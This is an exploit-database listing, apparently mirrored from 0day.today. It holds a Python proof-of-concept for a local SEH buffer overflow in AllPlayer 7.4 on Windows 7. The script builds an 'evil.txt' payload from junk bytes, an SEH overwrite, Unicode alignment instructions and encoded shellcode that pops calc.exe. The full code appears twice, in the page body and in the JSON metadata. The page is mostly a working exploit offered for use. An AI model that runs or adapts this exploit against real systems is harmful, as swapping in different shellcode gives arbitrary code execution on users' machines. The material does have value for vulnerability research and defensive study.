Search...

AllPlayer 7.4 - SEH Buffer Overflow (Unicode) Exploit

2019-04-09T00:00:00

ID 1337DAY-ID-32512
Type zdt
Reporter Chris Au
Modified 2019-04-09T00:00:00

Description

Exploit for windows platform in category local exploits

                                        
                                            #!/usr/bin/python -w

#
# Exploit Author: Chris Au
# Exploit Title:  AllPlayer V7.4 - Local Buffer Overflow (SEH Unicode)
# Vulnerable Software: AllPlayer V7.4
# Vendor Homepage: https://www.allplayer.org/
# Version: 7.4
# Software Link: http://allplayer.org/Download/ALLPlayerEN.exe
# Tested Windows Windows 7 SP1 x86
#
#
# PoC
# 1. generate evil.txt, copy contents to clipboard
# 2. open AllPlayer
# 3. select "Open video or audio file", click "Open URL"
# 4. paste contents from clipboard
# 5. select OK
# 6. calc.exe
#

filename="evil.txt"
header = "http://"
junk = "\xcc" * 301
nseh = "\x90\x45"
seh = "\x7a\x74" #pop pop retn
valign = (
"\x55" #push ebp
"\x45" #align
"\x58" #pop eax
"\x45" #align
"\x05\x20\x11" #add eax,11002000
"\x45" #align
"\x2d\x18\x11" #sub eax,11001900
"\x45" #align
"\x50" #push eax
"\x45" #align
"\xc3" #retn
)
#nop to shell
nop = "\xcc" * 115
shellcode = (
"PPYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAI"
"AQAIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1AIQIAIQI111AIA"
"JQYAZBABABABABkMAGB9u4JBkLK8qrM0ypyps0e9xeP1Y0RD4K"
"npnPrkPRLLbkb2N42kt2lhlOegmzkvMaYodlMl0aqlKRnLo0Uq"
"foLMzai7zBl2nrOgTKnrJptKNjoLBkpLjqahISQ8KQ8QpQRkaI"
"kpKQYCbkMyzxHcnZq9bkNTTK9q9FMaYofLVa8OLMjaI7p8GpRU"
"9flCamXxmksMo4d5JD1HrknxMTYq8Sc6RkJl0KtKnxKlkQFs4K"
"zdtKKQJ0RiQ4NDLdOkOkC1pYOjOakOyPQOqOpZ4KN2zKTMaM0j"
"kQbmu55bKP9pM0b0C8014KROQwkOIEek8pTuTbPVQXcvTU7MeM"
"iohUOLm6qlyze09k7p0u9ugKa7mCPrbOqZ9pOcYoHURCPa0l0c"
"Lnc51hOuipAA")
fill = "\x45" * 5000
buffer = header + junk + nseh + seh + valign + nop + shellcode + fill
textfile = open(filename , 'w')
textfile.write(buffer)
textfile.close()


#  0day.today [2019-04-11]  #

JSON Vulners Source

Initial Source

{"id": "1337DAY-ID-32512", "bulletinFamily": "exploit", "title": "AllPlayer 7.4 - SEH Buffer Overflow (Unicode) Exploit", "description": "Exploit for windows platform in category local exploits", "published": "2019-04-09T00:00:00", "modified": "2019-04-09T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://0day.today/exploit/description/32512", "reporter": "Chris Au", "references": [], "cvelist": [], "type": "zdt", "lastseen": "2019-04-11T21:42:30", "edition": 1, "viewCount": 393, "enchantments": {"score": {"value": -0.0, "vector": "NONE", "modified": "2019-04-11T21:42:30", "rev": 2}, "dependencies": {"references": [], "modified": "2019-04-11T21:42:30", "rev": 2}, "vulnersScore": -0.0}, "sourceHref": "https://0day.today/exploit/32512", "sourceData": "#!/usr/bin/python -w\r\n\r\n#\r\n# Exploit Author: Chris Au\r\n# Exploit Title: AllPlayer V7.4 - Local Buffer Overflow (SEH Unicode)\r\n# Vulnerable Software: AllPlayer V7.4\r\n# Vendor Homepage: https://www.allplayer.org/\r\n# Version: 7.4\r\n# Software Link: http://allplayer.org/Download/ALLPlayerEN.exe\r\n# Tested Windows Windows 7 SP1 x86\r\n#\r\n#\r\n# PoC\r\n# 1. generate evil.txt, copy contents to clipboard\r\n# 2. open AllPlayer\r\n# 3. select \"Open video or audio file\", click \"Open URL\"\r\n# 4. paste contents from clipboard\r\n# 5. select OK\r\n# 6. calc.exe\r\n#\r\n\r\nfilename=\"evil.txt\"\r\nheader = \"http://\"\r\njunk = \"\\xcc\" * 301\r\nnseh = \"\\x90\\x45\"\r\nseh = \"\\x7a\\x74\" #pop pop retn\r\nvalign = (\r\n\"\\x55\" #push ebp\r\n\"\\x45\" #align\r\n\"\\x58\" #pop eax\r\n\"\\x45\" #align\r\n\"\\x05\\x20\\x11\" #add eax,11002000\r\n\"\\x45\" #align\r\n\"\\x2d\\x18\\x11\" #sub eax,11001900\r\n\"\\x45\" #align\r\n\"\\x50\" #push eax\r\n\"\\x45\" #align\r\n\"\\xc3\" #retn\r\n)\r\n#nop to shell\r\nnop = \"\\xcc\" * 115\r\nshellcode = (\r\n\"PPYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAI\"\r\n\"AQAIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1AIQIAIQI111AIA\"\r\n\"JQYAZBABABABABkMAGB9u4JBkLK8qrM0ypyps0e9xeP1Y0RD4K\"\r\n\"npnPrkPRLLbkb2N42kt2lhlOegmzkvMaYodlMl0aqlKRnLo0Uq\"\r\n\"foLMzai7zBl2nrOgTKnrJptKNjoLBkpLjqahISQ8KQ8QpQRkaI\"\r\n\"kpKQYCbkMyzxHcnZq9bkNTTK9q9FMaYofLVa8OLMjaI7p8GpRU\"\r\n\"9flCamXxmksMo4d5JD1HrknxMTYq8Sc6RkJl0KtKnxKlkQFs4K\"\r\n\"zdtKKQJ0RiQ4NDLdOkOkC1pYOjOakOyPQOqOpZ4KN2zKTMaM0j\"\r\n\"kQbmu55bKP9pM0b0C8014KROQwkOIEek8pTuTbPVQXcvTU7MeM\"\r\n\"iohUOLm6qlyze09k7p0u9ugKa7mCPrbOqZ9pOcYoHURCPa0l0c\"\r\n\"Lnc51hOuipAA\")\r\nfill = \"\\x45\" * 5000\r\nbuffer = header + junk + nseh + seh + valign + nop + shellcode + fill\r\ntextfile = open(filename , 'w')\r\ntextfile.write(buffer)\r\ntextfile.close()\r\n\n\n# 0day.today [2019-04-11] #"}